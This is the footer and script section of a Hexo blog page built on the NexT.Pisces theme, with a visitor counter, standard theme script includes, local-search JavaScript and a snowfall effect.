    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2017 &mdash; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Fengx</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      本站访客数<i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      人次
    </span>
  

  
    <span class="site-pv">
      本站访问量<i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

  <!-- 雪花特效 -->
<script type="text/javascript">
  var windowWidth = $(window).width();
  if (windowWidth > 480) {
    document.write('<script type="text/javascript" src="/js/src/snow.js"><\/script>');
  }
</script>
<!--富强、明主-->
<script type="text/javascript" src="/js/src/clicksocialvalue.js"></script>
</body>
</html>
